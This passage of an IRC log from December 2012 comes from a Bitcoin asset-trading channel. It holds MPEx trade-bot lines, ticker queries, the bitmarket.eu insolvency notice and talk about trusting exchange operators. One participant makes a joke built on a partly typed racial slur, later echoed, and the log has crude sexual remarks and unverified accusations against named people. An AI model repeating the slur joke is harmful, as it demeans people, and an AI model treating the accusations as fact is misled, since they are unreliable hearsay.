23:38:37 i'm disappointed Dec 20 23:38:38 apparently not a real troll Dec 20 23:42:31 [MPEX] [S.MPOE] 10451 @ 0.00062 = 6.4796 BTC [+] Dec 20 23:45:00 nobody wants teh codez. cheapskates. Dec 20 23:45:26 icecubes in alaska Dec 20 23:45:30 you need to sell it to some bank Dec 20 23:46:14 them scammers? never Dec 20 23:47:04 [MPEX] [S.MPOE] 6067 @ 0.00062 = 3.7615 BTC [+] Dec 20 23:53:06 really, if a bank approached me for that.. that would blow me off Dec 20 23:56:02 why would it approach you ? Dec 20 23:56:12 they have no way of knowing you exist, not like socgen trolls irc Dec 20 23:57:43 so you meant it the other way around? me going to the bank, offering interface to that mpex thing? Dec 20 23:58:14 sooner or later they'll be desperate to interface. Dec 20 23:58:25 that's when what you learned fucking with it will command 10btc/hour Dec 21 00:00:45 yeah, i'd be rather be fucking with something else, but that will be, too. Dec 21 00:03:11 [MPEX] [S.MPOE] 5395 @ 0.00062 = 3.3449 BTC [+] Dec 21 00:06:58 [MPEX] [S.MPOE] 7000 @ 0.00062 = 4.34 BTC [+] Dec 21 00:07:59 [MPEX] [S.MPOE] 10490 @ 0.00062 = 6.5038 BTC [+] Dec 21 00:14:51 https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/46399_233110583489421_1490839577_n.jpg Dec 21 00:17:27 its 12 21 in new zealand already so, uh whatever Dec 21 00:26:52 ;ticker Dec 21 00:26:58 ;;ticker Dec 21 00:26:59 BTCUSD ticker | Best bid: 13.58001, Best ask: 13.63999, Bid-ask spread: 0.05998, Last trade: 13.56001, 24 hour volume: 36180.25779632, 24 hour low: 13.32591, 24 hour high: 13.72000, 24 hour vwap: 13.52947 Dec 21 00:27:33 [MPEX] [S.MPOE] 10100 @ 0.00062 = 6.262 BTC [+] Dec 21 00:36:59 [MPEX] [S.MPOE] 7850 @ 0.00062 = 4.867 BTC [+] Dec 21 00:38:13 [MPEX] [S.MPOE] 4600 @ 0.00062 = 2.852 BTC [+] Dec 21 00:53:00 [MPEX] [S.MPOE] 4650 @ 0.00062 = 2.883 BTC [+] Dec 21 00:55:31 [MPEX] [O.BTCUSD.C120T] 320 @ 0.18066152 = 57.8117 BTC [-] Dec 21 00:59:34 ;;ticker Dec 21 00:59:35 BTCUSD ticker | Best bid: 13.57214, Best ask: 13.59090, Bid-ask spread: 0.01876, Last trade: 13.57214, 24 hour volume: 37126.85270592, 24 hour low: 13.32591, 24 hour high: 13.72000, 24 hour vwap: 13.53985 Dec 21 01:00:57 [MPEX] [S.MPOE] 3600 @ 0.00062 = 2.232 BTC [+] Dec 21 01:13:01 ;;ticker Dec 21 01:13:02 BTCUSD ticker | Best bid: 13.58001, Best ask: 13.59900, Bid-ask spread: 0.01899, Last trade: 13.59890, 24 hour volume: 37146.18653791, 24 hour low: 13.32591, 24 hour high: 13.72000, 24 hour vwap: 13.54030 Dec 21 01:24:15 [MPEX] [S.MPOE] 2242 @ 0.00062 = 1.39 BTC [+] Dec 21 01:30:22 thestringpuller: ya know, rather than doing multiple ;;tickers, if all you want is up to date exchange rates, /j #bitcoin-market Dec 21 01:30:49 [MPEX] [S.MPOE] 11237 @ 0.00062 = 6.9669 BTC [+] Dec 21 01:31:32 im driving Dec 21 01:38:38 there is a bitcoin price widget too for android. Dec 21 01:39:02 check that out later when your velocity is lower. **** BEGIN LOGGING AT Fri Dec 21 09:58:30 2012 Dec 21 09:59:38 smickles yes. jurov's representation is muchly exagerated :D Dec 21 10:07:30 [MPEX] [S.MPOE] 4976 @ 0.00062 = 3.0851 BTC [+] Dec 21 10:28:22 [MPEX] [S.MPOE] 14393 @ 0.00062 = 8.9237 BTC [+] Dec 21 10:50:50 [MPEX] [S.MPOE] 4232 @ 0.00062 = 2.6238 BTC [+] Dec 21 10:52:08 [MPEX] [S.MPOE] 8100 @ 0.00062 = 5.022 BTC [+] Dec 21 10:59:20 [MPEX] [S.DICE] 1795 @ 0.00350019 = 6.2828 BTC [+] Dec 21 10:59:22 [MPEX] [S.DICE] 1768 @ 0.00350489 = 6.1966 BTC [+] Dec 21 10:59:23 [MPEX] [S.DICE] 600 @ 0.00357336 = 2.144 BTC [+] Dec 21 10:59:23 [MPEX] [S.DICE] 837 @ 0.0036 = 3.0132 BTC [+] Dec 21 11:08:18 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.24539864 = 245.3986 BTC [-] Dec 21 11:08:23 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.17780145 = 177.8015 BTC [-] Dec 21 11:32:02 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.12218421 = 122.1842 BTC [+] Dec 21 11:32:03 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.17711205 = 177.1121 BTC [-] Dec 21 11:32:22 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.24469787 = 244.6979 BTC [-] Dec 21 11:33:19 [MPEX] [S.BVPS] 5 @ 0.00331001 = 0.0166 BTC [-] Dec 21 11:34:44 [MPEX] [S.MPOE] 5950 @ 0.00062 = 3.689 BTC [+] Dec 21 11:45:25 [MPEX] [S.MPOE] 13208 @ 0.00062 = 8.189 BTC [+] Dec 21 11:47:16 [MPEX] [S.MPOE] 3500 @ 0.00062 = 2.17 BTC [+] Dec 21 11:53:32 [MPEX] [S.MPOE] 7600 @ 0.00062 = 4.712 BTC [+] Dec 21 12:01:09 [MPEX] [S.MPOE] 4050 @ 0.00062 = 2.511 BTC [+] Dec 21 12:16:24 [MPEX] [O.BTCUSD.C150T] 370 @ 0.02807186 = 10.3866 BTC [-] Dec 21 12:24:01 [MPEX] [S.MPOE] 6843 @ 0.00062 = 4.2427 BTC [+] Dec 21 12:26:01 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.48844982 = 488.4498 BTC [-] Dec 21 12:26:02 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.41387733 = 413.8773 BTC [-] Dec 21 12:29:33 Unfortunately, I have very bad news. I cannot currently proccess your withdrawals. The situation is very complicated and it's all my fault, that's why I feel terrible about it. I tried to make this up, to keep the site afloat and somehow recover the funds, but it's not possible anymore. Right now there are 1786 BTC pending withdrawal, which I can't honor... Dec 21 12:29:42 bitmarket.eu is screwed. Dec 21 12:31:28 mircea_popescu: will it be fixed eventually? Dec 21 12:31:37 i don't think so. Dec 21 12:32:20 and tbh i think keeping money in anything other than mtgox and those frenchypoofs with the eu partnership is at this point cruising for a bruising. Dec 21 12:33:02 the exchange market is going out of the "we can do anything" phase, there's no room left for one man and his hopes operations. which means pretty much all the extant ones will close down, and likely miost of them will close down ugly. Dec 21 12:33:35 spot sellers a la d&t DBordello etc are probably safe for a while yet, but in general it's a closing window. Dec 21 12:41:12 [MPEX] [S.MPOE] 3900 @ 0.00062 = 2.418 BTC [+] Dec 21 12:44:41 [MPEX] [S.MPOE] 8150 @ 0.00062 = 5.053 BTC [+] Dec 21 12:47:54 [MPEX] [S.MPOE] 4254 @ 0.00062 = 2.6375 BTC [+] Dec 21 12:56:35 [MPEX] [S.MPOE] 7018 @ 0.00062 = 4.3512 BTC [+] Dec 21 12:57:12 [MPEX] [S.MPOE] 6630 @ 0.00062 = 4.1106 BTC [+] Dec 21 13:06:46 mircea_popescu: you lost BTC because of bitmarket.eu? is there any public announcement of issues on their side? Dec 21 13:07:10 i lost nothing Dec 21 13:07:50 i saw the announcement, not sure if it was published Dec 21 13:07:56 http://trilema.com/2012/and-another-one-bites-the-dust-bitmarketeu/ there it is quoted and adnotated. Dec 21 13:08:24 nm, it was announced i'm told. here : https://bitcointalk.org/index.php?topic=5441.msg1413156#msg1413156 Dec 21 13:08:54 oh Dec 21 13:09:02 you were quoting Dec 21 13:09:57 ... Dec 21 13:10:09 lmao! Dec 21 13:10:27 yeah, me too Dec 21 13:10:29 what is with this expectation! it's getting ridiculous Dec 21 13:11:08 well, everything in bitcoinland is a scam, isn't it? :-) Dec 21 13:11:10 in fairness, i should probably learn about quotation marks Dec 21 13:11:40 but you know... i was here before pirate. some people preferred bitcoinica to mpoe. those people got screwed. it was a choice tho wasn't it. Dec 21 13:12:02 um yeah, i misunderstood too, was looking in forum for your announce mircea_popescu Dec 21 13:12:37 well at any rate i'm not going bust over 1700 btc omfg. Dec 21 13:17:42 um... "there are 20161 19980 BTC missing (edit: I subtracted my funds that also were deposited on Bitmarket), and Bitcoinica claims total for around 50K USD" Dec 21 13:17:55 20161 is crossed out Dec 21 13:18:25 basically, he was trading 20k of OPM on the strenght of 180 of his own Dec 21 13:18:27 this is 100:1 Dec 21 13:18:36 and then took that leverage and did a 5:1 on top of it at bitcoinica Dec 21 13:18:39 this is 500:1. Dec 21 13:18:47 [MPEX] [S.MPOE] 3774 @ 0.00062 = 2.3399 BTC [+] Dec 21 13:18:47 i do not know anyone who ever did this before. ever. Dec 21 13:18:56 OPM? Dec 21 13:18:58 and he says he has experience. yet even hedge funds stop shy of 100:! Dec 21 13:19:01 other people's money. Dec 21 13:19:05 oh, other people's money Dec 21 13:38:54 http://bitcoinstatus.rowit.co.uk/hosts.html isn't this mildly concerning ? Dec 21 13:39:06 bitcoin had ~60k hosts last sept but is around 18k now Dec 21 13:45:03 [MPEX] [S.MPOE] 3026 @ 0.00062 = 1.8761 BTC [+] Dec 21 13:46:32 it's actually getting better, slowly, but still better than July/August Dec 21 13:47:04 [MPEX] [S.MPOE] 3634 @ 0.00062 = 2.2531 BTC [+] Dec 21 13:48:03 [MPEX] [O.BTCUSD.P130T] 700 @ 0.05261037 = 36.8273 BTC [-] Dec 21 13:48:21 ;;seen rg Dec 21 13:48:21 rg was last seen in #bitcoin-assets 5 days, 14 hours, 9 minutes, and 48 seconds ago: good times Dec 21 14:18:04 [MPEX] [S.MPOE] 4000 @ 0.00062 = 2.48 BTC [+] Dec 21 14:28:03 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.08460123 = 84.6012 BTC [-] Dec 21 14:42:32 [MPEX] [S.MPOE] 9300 @ 0.00062 = 5.766 BTC [+] Dec 21 14:56:04 [MPEX] [S.MPOE] 6600 @ 0.00062 = 4.092 BTC [+] Dec 21 14:59:04 [MPEX] [S.MPOE] 9300 @ 0.00062 = 5.766 BTC [+] Dec 21 15:05:04 [MPEX] [S.MPOE] 13500 @ 0.00062 = 8.37 BTC [+] Dec 21 15:29:04 [MPEX] [S.MPOE] 2700 @ 0.00062 = 1.674 BTC [+] Dec 21 15:31:03 [MPEX] [S.MPOE] 5776 @ 0.00062 = 3.5811 BTC [+] Dec 21 16:04:04 [MPEX] [S.MPOE] 14500 @ 0.00062 = 8.99 BTC [+] Dec 21 16:08:55 mircea_popescu: people dropping bitcoin-client for electrum/armory/ webwallets? Dec 21 16:09:05 must be Dec 21 16:09:08 kinda sucky tho. Dec 21 16:10:38 though i am getting annoyed with electrum - what is it with "developers" using glorified text files as a database? Dec 21 16:12:55 hehe, good apology: https://bitcointalk.org/index.php?topic=123492.msg1412053#msg1412053 Dec 21 16:13:38 https://www.youtube.com/watch?v=mtG3HywuYlE Dec 21 16:13:40 ahaha this is funny Dec 21 16:14:37 "The percentage of working age Americans with a job has been under 59 percent for 39 months in a row." Dec 21 16:14:56 jurov lol miracea ;/ Dec 21 16:14:58 for my sins Dec 21 16:15:39 Can be your sister Dec 21 16:15:53 i was perturbed enough a year or so ago when i found out who mircea monroe is Dec 21 16:16:42 shres pretty hot Dec 21 16:16:48 yeah. Dec 21 16:17:02 yes. wait when usagi finds out Dec 21 16:17:03 [MPEX] [S.MPOE] 9950 @ 0.00062 = 6.169 BTC [+] Dec 21 16:17:11 o boy. Dec 21 16:17:12 you should use her imdb pic as your profile pic. REALLY confuse ppl. http://www.imdb.com/name/nm1597260/ Dec 21 16:17:40 http://trilema.com/2010/mircea-mircea-monroe/ i think those are better Dec 21 16:17:43 but yea, i'd do her. Dec 21 16:17:52 and we could have babies and name them all mircea mircea Dec 21 16:18:05 the girls could be mircea mircea after their mother Dec 21 16:18:09 and the boys mircea mircea after me Dec 21 16:19:02 so you'll change last name to mircea too? Dec 21 16:19:31 what last names. they're going out of fashion. Dec 21 16:19:46 "eNumbered is the choice of Occupy, Anonymous and Silk Road users." << ahaha people are seriously retarded enough to think this is a selling point ? Dec 21 16:19:54 "use the same currency poor people use!!!" Dec 21 16:20:16 100% backed by gold, 1.25% monthly guaranteed. Dec 21 16:20:29 apparently they've taken egold and added some ponzi to the mix. Dec 21 16:22:28 that sounds vaguely solidcoin2.0ish - does it have account depreciation built in as well? Dec 21 16:23:03 not yet. possibly once they find the solidcoin forums Dec 21 16:30:15 hey guys Dec 21 16:30:18 how bad is usagi? Dec 21 16:30:20 scammer tag wise? Dec 21 16:30:31 I hear ppl make scam accusations, and other sregard him decently Dec 21 16:30:37 he hasasked to list BMF on BF Dec 21 16:31:05 [MPEX] [S.MPOE] 1100 @ 0.00062 = 0.682 BTC [+] Dec 21 16:31:25 he owes me 20btc Dec 21 16:31:40 does he have plans to pay back? Dec 21 16:31:49 from his "insured fund" Dec 21 16:31:58 which fund Dec 21 16:32:02 i wrote it off Dec 21 16:32:04 nyan.a Dec 21 16:33:12 i mean Dec 21 16:33:18 he doesnt even have a scammer tag (yet) Dec 21 16:33:27 and wrote he is trying to make good on BMF Dec 21 16:33:54 bmf? Dec 21 16:34:23 yea Dec 21 16:34:37 he wants to liquidate Dec 21 16:34:44 dont let him list Dec 21 16:34:56 why bother relisting then? Dec 21 16:35:00 smickles had a loan defaulted from him Dec 21 16:35:05 and so on Dec 21 16:35:09 all bad experiences Dec 21 16:35:21 no good can come of listing his assets Dec 21 16:35:32 smickles: ? Dec 21 16:36:22 what is bmf, Ukto? Dec 21 16:36:34 some asset usagi has been running Dec 21 16:36:37 i am looking into it now Dec 21 16:36:45 yes but what kind of Dec 21 16:36:49 where the asset invested? Dec 21 16:36:59 as soon as I find the thread ill tell you :P Dec 21 16:37:03 alright Dec 21 16:37:28 miing bonds Dec 21 16:37:51 smickles is mircea's broker Dec 21 16:37:52 ahh Dec 21 16:37:54 yes Dec 21 16:38:02 is smickles legit? Dec 21 16:38:10 very Dec 21 16:38:16 good. Dec 21 16:38:23 how many of you know him irl? Dec 21 16:38:28 I havent personally seen anything negative re: smickles. only positive++ Dec 21 16:39:05 thestringpuller: here is how I am seeing it Dec 21 16:40:01 If he's listng just to liquidate, (he is already offered to pay the listing fee to use the service so meh), but.. even if its liquidation, at least it will help the community get something back Dec 21 16:40:08 rather than all exchanges turning him down Dec 21 16:40:17 and he says fuck it and buys nothing back Dec 21 16:40:34 why did it got messed up? Dec 21 16:40:39 GLBSE or piratE? Dec 21 16:40:42 i have no idea Dec 21 16:40:44 dude he should liquidate off exchangr Dec 21 16:40:47 i cant find a detailed thread Dec 21 16:40:56 and buy liquidate i mean bankruptcy Dec 21 16:40:59 by* Dec 21 16:41:20 his asets are no good Dec 21 16:41:25 he has too much debt Dec 21 16:46:12 Ukto well, he's nutty and fucked up a set of imaginary assets. Dec 21 16:46:36 you're probably looking at more drama than it's worth. Dec 21 16:47:04 [MPEX] [S.MPOE] 24595 @ 0.00062 = 15.2489 BTC [+] Dec 21 16:47:06 Anduck he had a miningthing (bmf), an insurance thing (cpa) and a braindamaged cdo thing (nyan series) Dec 21 16:47:30 none of these actually ever did what they were supposed to. the bmf thing never had actual mining gear, for isntance. Dec 21 16:47:50 that as to usagi. Dec 21 16:48:10 as to smickles i never met him irl but he's been my broker for a while and upstanding. Dec 21 16:48:25 are _you_ trusted? Dec 21 16:48:33 who are you? Dec 21 16:48:37 what do you do? Dec 21 16:48:39 o.o Dec 21 16:48:51 what makes you trustful? Dec 21 16:48:52 well, i am the mircea popescu of MPEx. Dec 21 16:48:59 i know Dec 21 16:49:07 a ok. so that's what i do. Dec 21 16:49:07 what makes people trust you? Dec 21 16:49:18 mmm. prolly best ask them ? Dec 21 16:49:25 don't you know yourself?? Dec 21 16:49:26 ;;getrating mircea_popescu Dec 21 16:49:26 WARNING: Currently not authenticated. User mircea_popescu, rated since Fri Jul 22 08:04:26 2011. Cumulative rating 100, from 46 total ratings. Received ratings: 45 positive, 1 negative. Sent ratings: 56 positive, 7 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=mircea_popescu Dec 21 16:49:29 there's a list. Dec 21 16:49:33 do people know you irl? Dec 21 16:49:52 btc people ? not rly. Dec 21 16:50:11 ok Dec 21 16:51:17 but if you come by timisoara you can buy me a drink. Dec 21 16:51:24 well why do people trust you Dec 21 16:51:34 if i made a exchange and named it "anducks exchange" , would people use i? Dec 21 16:51:48 possibly not at first. it's been going for a while tho. Dec 21 16:51:50 lol Dec 21 16:52:06 trust is built Dec 21 16:52:15 well Dec 21 16:52:17 people act in a trustworthy way and people trust them Dec 21 16:52:17 mircea makes me money Dec 21 16:52:20 Graet his q is pretty stumping tho. i mean, why do people trust one! Dec 21 16:52:21 pirate built a nice trust and then boom scammed Dec 21 16:52:27 usagi loses me money Dec 21 16:52:31 do the math Dec 21 16:52:33 thestringpuller: i guess pirate made you monies too xD Dec 21 16:52:33 asking someone why ppl trust them is a rather loaded question Dec 21 16:52:44 well Dec 21 16:52:50 Graet: have you met him irl? Dec 21 16:52:53 ask some of the ppl that trust him why they do would makle more sense :) Dec 21 16:52:55 pirate lost me money and i had 0 exposure Dec 21 16:52:56 do you even know where he lives? Dec 21 16:53:02 what makes him not to run with your moeny? Dec 21 16:53:15 i think some people met pirate or else someone hired for the job at some point Dec 21 16:53:18 no, but i havent met you either, nor most of the 150 odd ppl that trust me and mine on my pool Dec 21 16:53:25 people STILL think pirate will come back and pay-WILL HE? Dec 21 16:53:30 so i'm reading this vladimir vs. magazine thread Dec 21 16:53:31 yeah they met pirate Dec 21 16:53:31 250* Dec 21 16:53:46 they met pirate and so pirate got like 100k more btc from them or something Dec 21 16:53:48 so meeting someone proves? Dec 21 16:53:53 Graet arguably tho, much less trust is needed to mine on a pool. at most they lose a few day's hash Dec 21 16:54:02 indeed Dec 21 16:54:19 then again, there was that pool-cum-ponzi combo recently Dec 21 16:54:19 my point is trust is built, not just given Dec 21 16:54:23 that's for sure. Dec 21 16:54:28 Ukto: usagi run assets are bad news but dont take our word for it Dec 21 16:54:29 Graet: well do you have any kind of agreement on anything Dec 21 16:54:33 moreover, if someone knew why people trust them they could hack more trust i guess Dec 21 16:54:44 Anduck, agreement with who? Dec 21 16:54:51 i mean.. with mircea_popescu Dec 21 16:54:57 no Dec 21 16:54:59 what if mircea_popescu now took all the monies xD Dec 21 16:54:59 agreement to what ? Dec 21 16:55:00 and ran Dec 21 16:55:10 mircea_popescu: tell me what makes you not to run with the money? Dec 21 16:55:14 he interviewed me for his magazine ~ 18 months ago Dec 21 16:55:21 nothing makes me. Dec 21 16:55:34 apart from that we have cjhatted on irc. i dont see your point Dec 21 16:55:36 hence trust. Dec 21 16:55:47 Graet o right i recall! Dec 21 16:55:52 ;) Dec 21 16:55:58 well Dec 21 16:56:19 people trusted _some random guy from internet_ with their life savings (btcst) Dec 21 16:56:26 wasnt it enough a lesson Dec 21 16:56:27 ? Dec 21 16:56:29 indeed Dec 21 16:56:34 i wasnt one... Dec 21 16:56:34 i am not saying mircea_popescu isnt trustful Dec 21 16:56:38 me neither Dec 21 16:56:41 Anduck people get divorced all the time, is that a lesson not to get married ? Dec 21 16:56:46 duh Dec 21 16:56:49 fuck yeah Dec 21 16:56:50 bad example! Dec 21 16:56:56 i need a 2nd Dec 21 16:57:06 divorce that is Dec 21 16:57:07 :P Dec 21 16:57:11 lol ok Dec 21 16:57:28 ok, i got a better one maybe. cars crash all the time, is that a lesson not to drive ? Dec 21 16:57:47 lol Dec 21 16:57:54 but you drive the car yourself Dec 21 16:58:00 https://bitcointalk.org/index.php?topic=131608.msg1413383#msg1413383 is roger ver milking the forum for lulz by now ? Dec 21 16:58:19 Anduck for some values of "yourself". Dec 21 17:06:47 [MPEX] [S.MPOE] 13550 @ 0.00062 = 8.401 BTC [+] Dec 21 17:07:53 mircea_popescu: Dec 21 17:08:15 i made a script to tell me how much mobey youve made based on the shares left Dec 21 17:08:28 1800 btc richer ;) Dec 21 17:09:25 err 6200* Dec 21 17:09:35 ;;ticker (10000000-6702311)* 0.00062 Dec 21 17:09:36 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Dec 21 17:09:39 ;;calc (10000000-6702311)* 0.00062 Dec 21 17:09:40 2044.56718 Dec 21 17:09:42 bout 2k Dec 21 17:10:44 incidentally, maybe this is a good answer for anduck Dec 21 17:11:00 i'm currently worth some 10s of k's in cash and some 100s of k's in stock Dec 21 17:11:08 it makes no sense to run off. Dec 21 17:11:49 you are retired Dec 21 17:11:54 where would you run too? Dec 21 17:11:58 to* Dec 21 17:12:00 sell all shit n run like ni...ni...nig....RUNN!! Dec 21 17:12:07 i was, but i came back out of it. Dec 21 17:12:16 nobody can stay retired for long before they're 60 or so i don't think Dec 21 17:30:30 wise words Dec 21 17:31:18 i'm sortof getting bored with all of this Dec 21 17:33:20 all of it ? Dec 21 17:33:42 here, feel better http://polimedia.us/dtng/c/src/135610253771.gif Dec 21 17:35:25 [MPEX] [S.MPOE] 8908 @ 0.00062 = 5.523 BTC [+] Dec 21 17:35:57 coinbr.com now working...outside bitvps Dec 21 17:36:06 live.coinbr.com not yet Dec 21 17:37:18 whole thing is such a farce...james did not pay for internet conenciton to switzerland datacenter Dec 21 17:37:42 he is noit reachable now and new owners supposedly can't do anything about that Dec 21 17:37:51 [MPEX] [S.MPOE] 30710 @ 0.00062 = 19.0402 BTC [+] Dec 21 17:40:18 i payed it last month btw Dec 21 17:40:25 switzerland Dec 21 17:40:48 will new owners trigger section "g" of the S.BVPS? Dec 21 17:41:20 if I hadn't rebooted my PC in the last month Dec 21 17:41:25 I'd have the swiss login Dec 21 17:41:43 [MPEX] [S.MPOE] 6250 @ 0.00062 = 3.875 BTC [+] Dec 21 17:41:46 As of this point, I am waiting for Usagi's ticket reply Dec 21 17:41:50 on what his plans are for sure Dec 21 17:43:45 uh Dec 21 17:44:05 pigeons quite possibly. giving them a little time to come up with proper reports and everything Dec 21 17:44:38 my understanding is rg's records were messy. Dec 21 17:45:30 [MPEX] [S.MPOE] 16400 @ 0.00062 = 10.168 BTC [+] Dec 21 17:47:41 i've paid the swiss bill 3 times now Dec 21 17:47:47 if that tells you anything Dec 21 17:48:06 2x i had to find out from rg that the bill was due Dec 21 17:48:12 and that's why my vps was offline Dec 21 17:49:11 and new owners knew nary of that? Dec 21 17:49:16 sorry i'll stfu Dec 21 17:49:20 shrug Dec 21 17:50:03 i've already grpp'd my logs and i don't have th login info anymore to pay it again Dec 21 17:50:16 i had it in a pm but it is gone now Dec 21 17:50:23 https://bitcointalk.org/index.php?topic=75867.msg1413513#msg1413513 Dec 21 17:50:49 apologies it got to this for those who invested Dec 21 17:51:11 ty Dec 21 17:51:59 jcpham: appreciate your patience with this... Dec 21 17:52:09 i'm fine Dec 21 17:52:19 tbh if you never pay i won't complain Dec 21 17:52:20 jcpham, okay but you're the owner? or why does namjies &co act surprised over this? Dec 21 17:52:37 sorry jurov i know nothing Dec 21 17:52:42 i own nothing Dec 21 17:53:02 my swiss vps has been offline 3x now and i've payed the bill to get it backonline Dec 21 17:53:11 rg gave me bitcoins Dec 21 17:53:17 for my services Dec 21 17:53:59 and by "payed the bill" I payed the swiss datacenter to get everyone's vps's back running Dec 21 17:54:31 rg seemed to forget about switzerland Dec 21 17:54:57 jcpham: I might need to take you up on that depending how this goes ;) Dec 21 17:55:12 we're talking maybe 10btc total Dec 21 17:55:13 that is NOT the plan, however Dec 21 17:55:24 which i want but it isn't going to help or hurt me Dec 21 17:55:26 jcpham: yeah Dec 21 17:55:34 [09:43] will new owners trigger section "g" of the S.BVPS? <-- I musta missed something, did RG sell? Dec 21 17:55:41 the most vocal people are folks with <100 shares Dec 21 17:55:52 silliness JWU42 Dec 21 17:55:55 _ Dec 21 17:56:17 at one point in time at close 1000 shares Dec 21 17:56:23 but i sold them Dec 21 17:56:57 I understand their frustration - I lost out on several GLBSE assets as well - but like you - for a dozen or so BTC - not worth the emotional energy to spaz over it Dec 21 17:57:17 but everyone has their right to be pissed Dec 21 17:57:17 people need their drugs off sr Dec 21 17:57:23 baaaad Dec 21 17:57:30 heh Dec 21 17:57:47 [MPEX] [S.MPOE] 5800 @ 0.00062 = 3.596 BTC [+] Dec 21 18:00:11 jcpham maybe you should get in touch with ajit/namjies ? Dec 21 18:01:43 we're all so in touch Dec 21 18:01:52 already Dec 21 18:07:52 rg not meticulous with paperwork? no way Dec 21 18:08:19 bitcoin d is cool as shit Dec 21 18:08:23 jurov Dec 21 18:08:41 i herd you have a coinbr api :P Dec 21 18:13:41 pigeons ikr, fud Dec 21 18:14:57 thestringpuller, not yet. i was just waiting for someone to ask for it Dec 21 18:15:22 [MPEX] [S.MPOE] 6662 @ 0.00062 = 4.1304 BTC [+] Dec 21 18:18:10 soo, Anduck and co made it in a new post. Dec 21 18:18:12 http://trilema.com/2012/is-smpoe-really-worth-that-much/ Dec 21 18:18:23 it's long but i really want to hear what the wise think. Dec 21 18:18:44 thestringpuller, not yet. i was just waiting for someone to ask for it <<< haha good policy. Dec 21 18:18:50 mircea_popescu? Dec 21 18:19:02 yay Dec 21 18:20:27 man i made it in the post Dec 21 18:20:57 :p Dec 21 18:21:01 damn irc logs can be pasted anywhere!! Dec 21 18:21:18 u included my jokes in it! goddamnyou" Dec 21 18:21:28 well its ok Dec 21 18:22:29 monies and the nignigrun Dec 21 18:24:28 hmmm.. Dec 21 18:24:38 lol Dec 21 18:24:38 btw mircea_popescu: what makes mpex superior to other exchanges?? Dec 21 18:24:54 http://mpex.co/faq.html#14 Dec 21 18:25:06 ok Dec 21 18:25:07 =) Dec 21 18:30:39 lol Dec 21 18:30:50 Double Cherry Truck insignia? Dec 21 18:31:08 every time i reread the faq, a new surprise Dec 21 18:32:13 ;;tslb Dec 21 18:32:17 Time since last block: 31 minutes and 26 seconds Dec 21 18:32:23 jurov :D Dec 21 18:34:09 cause no one expects the spanish inquisition Dec 21 18:36:30 JWU42 what's the total yabmc story ? about 20k or so ? Dec 21 18:38:37 mircea_popescu: wtf is that crap doing in the FAQ page Dec 21 18:38:53 "awards" and other stuff that makes "REAL WORLD PEOPLE" think it as a joke Dec 21 18:39:13 one running a system like that should not treat is as a joke in any way Dec 21 18:39:19 i guess it makes real world people think of it as a joke. Dec 21 18:39:26 because why ? Dec 21 18:39:30 tell me Dec 21 18:39:54 i mean - it just seems to me like some kid made a site ....... Dec 21 18:40:19 well if you want people to use your service Dec 21 18:40:31 it's not the best way to also make people interested in BTC Dec 21 18:40:37 when all the services are semi-jokes Dec 21 18:40:39 i guess is the advantage of the rich - they see more humour in life ? Dec 21 18:40:48 well , might be Dec 21 18:40:49 what;s the problem with a little fun ? Dec 21 18:41:15 some may think it's too much fun Dec 21 18:41:21 here's the difference : this service is doing things right and has a little humour. the others are mostly humourless hacks doing things wrong. Dec 21 18:41:30 trying too hard is a failure mode. Dec 21 18:42:07 mmmhh Dec 21 18:42:23 actually most other sites look like they are made by kids Dec 21 18:42:46 [MPEX] [S.MPOE] 6900 @ 0.00062 = 4.278 BTC [+] Dec 21 18:45:41 Anduck: if someone (mircea_popescu) writes about himself in third person, you know something is off. Especially, if they plaster their own name on every silly thing they think they "invented". Dec 21 18:46:03 lol Dec 21 18:46:05 [MPEX] [S.DICE] 179 @ 0.00358628 = 0.6419 BTC [-] Dec 21 18:47:47 mircea_popescu: who are the 5 other businesses Dec 21 18:48:03 [MPEX] [S.MPOE] 14250 @ 0.00062 = 8.835 BTC [+] Dec 21 18:49:01 thestringpuller hard to say. mtgox and sdice are there for sure. Dec 21 18:49:12 possibly the one asic maker that actually delivers is there too Dec 21 18:49:18 we just don't know yet. Dec 21 18:49:18 ROFLOL Dec 21 18:49:21 maybe one or two miners Dec 21 18:49:27 LTC-Global created security BMF Dec 21 18:49:28 sr, possibly. Dec 21 18:49:30 oh well Dec 21 18:49:32 dont care Dec 21 18:49:50 LOL Dec 21 18:50:01 which one is bmf again ? usagi ? Dec 21 18:50:13 I guess that was Usagi's response to "What are your plans for BMF?" Dec 21 18:50:30 He opened a ticket on BF wanting to list BMF Dec 21 18:50:33 mircea_popescu: yes Dec 21 18:50:34 mircea_popescu: code trading Dec 21 18:50:41 thats the next big business Dec 21 18:50:45 and review Dec 21 18:50:48 like you said Dec 21 18:51:25 meh. i'll believe it once someone licenses coinbr code at fair price Dec 21 18:51:31 i sent rowit.co.uk folks a mail see if they're up for it Dec 21 18:53:49 ROFLOL: https://bitcointalk.org/index.php?topic=88008.msg1413640#msg1413640 Dec 21 18:54:07 someones getting jealous :P Dec 21 18:54:26 unless crypto posted something that I somehow missed, and he doesnt want to link Dec 21 19:17:54 ;;tslb Dec 21 19:18:03 Time since last block: 6 minutes and 1 second Dec 21 19:18:56 ;;ticker Dec 21 19:18:57 BTCUSD ticker | Best bid: 13.54311, Best ask: 13.54999, Bid-ask spread: 0.00688, Last trade: 13.54311, 24 hour volume: 28976.00583363, 24 hour low: 13.41999, 24 hour high: 13.64750, 24 hour vwap: 13.55264 Dec 21 19:19:26 what? i see c11, c12, c13 and they skipped c14 (where my orders are) and went to c15! Dec 21 19:20:13 lolercakes Dec 21 19:21:45 < Ukto> smickles: ? << what's up? Dec 21 19:22:13 < Anduck> how many of you know him irl? << probably none, you anywhere near tucson AZ? Dec 21 19:22:24 smickles Dec 21 19:22:28 im in fin Dec 21 19:22:34 i havr order for you lok Dec 21 19:22:35 lol Dec 21 19:26:01 smickles i think those were sells, by the price 